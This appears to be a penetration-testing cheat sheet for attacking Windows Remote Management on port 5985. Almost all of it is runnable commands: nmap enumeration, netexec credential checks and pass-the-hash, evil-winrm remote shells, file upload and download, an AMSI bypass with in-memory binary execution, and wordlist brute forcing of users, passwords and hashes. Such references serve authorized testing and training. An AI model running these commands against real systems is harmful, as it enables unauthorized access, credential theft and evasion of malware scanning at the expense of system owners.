Information

Default Port: 5985

PORT     STATE SERVICE
5985/tcp open  wsman

Enumeration

nmap -p5985 -sS 192.168.1.2
nmap -p5985 -sVC 192.168.1.2

Check Credentials

# password
netexec winrm 192.168.1.2 -u administrador -p Password1
netexec winrm 192.168.1.2 -u administrador -p Password1 --local-auth
# hash
netexec winrm 192.168.1.2 -u administrator -H <HASH>
netexec winrm 192.168.1.2 -u administrator -H <HASH> --local-auth

Connect

# gem install evil-winrm
evil-winrm -i 192.168.1.2 -u administrator -p Password1          # password
evil-winrm -i 192.168.1.2 -u administrator -H <HASH>             # hash

File Transfer

Evil-WinRM PS C:\Windows\Temp> upload <FILE>                     # upload
Evil-WinRM PS C:\Windows\Temp> download <FILE>                   # download

AMSI Bypass

Evil-WinRM PS C:\Windows\Temp> menu
Evil-WinRM PS C:\Windows\Temp> Bypass-4MSI
Evil-WinRM PS C:\Windows\Temp> Invoke-Binary /home/kali/binary.exe

Brute Force

netexec winrm 192.168.1.2 -u users.dic -p Password1               # user
netexec winrm 192.168.1.2 -u administrador -p rockyou.txt         # password
netexec winrm 192.168.1.2 -u administrador -H hashes.txt          # hash